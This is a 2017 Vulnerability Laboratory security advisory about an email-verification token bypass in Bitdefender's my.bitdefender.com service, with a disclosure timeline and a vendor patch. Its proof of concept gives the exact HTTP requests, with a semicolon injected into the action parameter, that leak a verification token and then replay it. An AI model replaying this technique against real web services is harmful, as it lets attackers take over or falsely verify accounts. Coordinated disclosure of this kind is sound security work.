[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Bit Defender #39 - Auth Token Bypass Vulnerability

Document Title:
===============
Bit Defender #39 - Auth Token Bypass Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1683


Release Date:
=============
2017-01-09


Vulnerability Laboratory ID (VL-ID):
====================================
1683


Common Vulnerability Scoring System:
====================================
5.9


Product & Service Introduction:
===============================
Bitdefender is a Romanian internet security software company, represented 
through subsidiaries and partners in over 100 countries. 
The company has been developing online protection since 2001. At September 2014 
Bitdefender technologies were installed in around 
500 million home and corporate devices across the globe.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Bitdefender )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote session 
token bypass vulnerability in the official Bitdefender online service 
web-application (my.bitdefender).


Vulnerability Disclosure Timeline:
==================================
2016-01-25: Researcher Notification & Coordination (Lawrence Amer)
2016-01-26: Vendor Notification (Bitdefender Security Team)
2016-02-03: Vendor Response/Feedback (Bitdefender Security Team)
2016-12-01: Vendor Fix/Patch by Check (Bitdefender Developer Team)
2017-01-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Bitdefender
Product: My Bitdefender - Online Service (Web-Application) 2016 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A token bypass vulnerability has been discovered in the official Bitdefender 
online service web-application (my.bitdefender).
The vulnerability allows remote attackers to bypass the secure protection 
mechanism of verification procedure in the online-service.

A vulnerability allows remote attackers to bypass the token which responsible 
for confirming the owner of current email address to get a 
confirmed account from bitdefender for security products. The vulnerability 
considerd as method followed by remote attackers to bypass the 
correct method of verfication . and located in module which reponsible for 
registering new customers [/lv2/account?login=] . a semia col 
added to parameter [ action] which expose the verfication token , which used 
later for bypassing.

The security risk of the token filter bypass web vulnerability is estimated as 
medium with a cvss (common vulnerability scoring system) count of 5.9. 
Exploitation of the token filter bypass web vulnerability requires no 
privileged user account or user interaction. Successful exploitation of the 
vulnerability results in unauthorized verification of user credentials in the 
online service web-application.

Request Method: 
                                [+] GET

Vulnerable Module:
                                [+] /lv2/account?login=

Vulnerable Parameter(s):
                                [+] [action]

Affected Domain(s): 
                                [+] my.bitdefender.com


Proof of Concept (PoC):
=======================
The token bypass web vulnerability can be exploited by a remote attackers 
without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerbility ...
1. The remote attacker registers wih my.bitdefender.com , after registration 
the current status of un-verfied accounts is [4] while the [1] is verfied 
2. Now the attacker add a semia col to action parameter like: action='  with 
GET Request: 

GET 
/lv2/account?login=vulnerabilitybugtrue@xxxxxxxx&pass=[EMAIL_CURRENT_PASSWORD]&action=;&type=userpass&fp=web&lang=en_us&beta=true
 HTTP/1.1
Host: my.bitdefender.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 
Iceweasel/22.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://my.bitdefender.com/login
Cookie: s_vi=[CS]v1|2B4FB32A051D2F01-6000190280001A6A[CE]; 
bd112=lY5LDoIwFEX30qQjCf1BsCTGgTp0BdYBlCpNLMXHI5gY9i4LYICzM7j35Ny%2BZIQXKUmL2JeGGTZNU1p7bNzDdY2D1MZg2ODRGXatfLewq8C2hh3fByoLqi5UnXx47gawVJ0%2Fu9g5gAgL9xBDj1TuCyr1MiQJQR%2FcgFXoSSmyXEnNVcHn5P8KGzusLBom1q1abLWu%2FQXncnPVWAePa54iU7nO5%2FsP;
 
visid_incap_444053=meSoTqUSRwCAL8O9SNbIZW5zn1YAAAAAQUIPAAAAAABtAdmh8HM0LDXk6stcsU0R;
 __qca=P0-565467393-1453315617095; 
trh3=AWsAlP%2BVbGRto4xjbW6TbmNtrpFdWXiUbGZsrqZiVFl3VaWZpaacl5GIppdUb6VtZV5dS66go5iWaGZhVGKnpmaimGegW49ecWOVlaBqVWOWY3ZtVKiboJibl4qqo1Rvm21kXFhcb2xiaGdsbqWgpg%3D%3D;
 shsid=11947017; rerew4=W56TmuvVMT0%2BDwA%3D; oidfg4=m5qTnLt4AQA%3D; 
fsd2=m5qTnLt4AQA%3D; __cfduid=dd46406ce24e76b99369c3c1422d61a881453744387; 
_ga=GA1.3.875146899.1453769753; bdselcid=en; country_id=en; _country=sy; 
_cbml=%7B%22name%22%3A%22en_us%22%7D; _cbmrb=false; _cbme=%22%22; 
_cbmci=%22%22; _gat=1
Connection: keep-alive


3. Got this response which will leak the verfication token 
Response : 
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 26 Jan 2016 01:31:41 GMT
Content-Type: application/json
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
X-Content-Type-Options: nosniff
CF-RAY: 26a875b0da9f356c-LHR
Content-Length: 229

{
  "preferences": "{"lang": "en_us"}", 
  "country_id": "204", 
  "token": "2OZ6INMWmWythZEonNWQjsy4GtE", 
  "error": "pending", 
  "passmd5": "e807f1fcf82d132f9bb018ca6738a19f", 
  "login": "vulnerabilitybugtrue@xxxxxxxx"
}


4. The last step is to use the token that was leaked from previous step

GET 
/lv2/act_pending?token=2OZ6INMWmWythZEonNWQjsy4GtE&redirect_uri=https%3A%2F%2Fmy.bitdefender.com%2Fdashboard%3F
 HTTP/1.1
Host: my.bitdefender.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 
Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

--------------Response ---------------------------------------
HTTP/1.1 302 FOUND
Server: cloudflare-nginx
Date: Tue, 26 Jan 2016 01:32:21 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Connection: keep-alive
Location: 
https://my.bitdefender.com/dashboard?&token=7iS15Wa2Zn1Jl3U2WGtZhiE7ll8&login=vulnerabilitybugtrue@xxxxxxxx&passmd5=e807f1fcf82d132f9bb018ca6738a19f
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
X-Content-Type-Options: nosniff
CF-RAY: 26a876a6c49a3530-LHR
-
Found



Video PoC: 
https://www.youtube.com/watch?v=LPSYJPL3GZU


Security Risk:
==============
The security risk of the session token bypass web vulnerability in the 
bitdefender web-application is estimated as high. (CVSS 5.9)


Credits & Authors:
==================
Lawrence Amer - ( 
http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                        - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - 
research@xxxxxxxxxxxxxxxxxxxxx                        - admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com       - 
vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
                        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a 
permission.

                                Copyright © 2017 | Vulnerability Laboratory - 
[Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com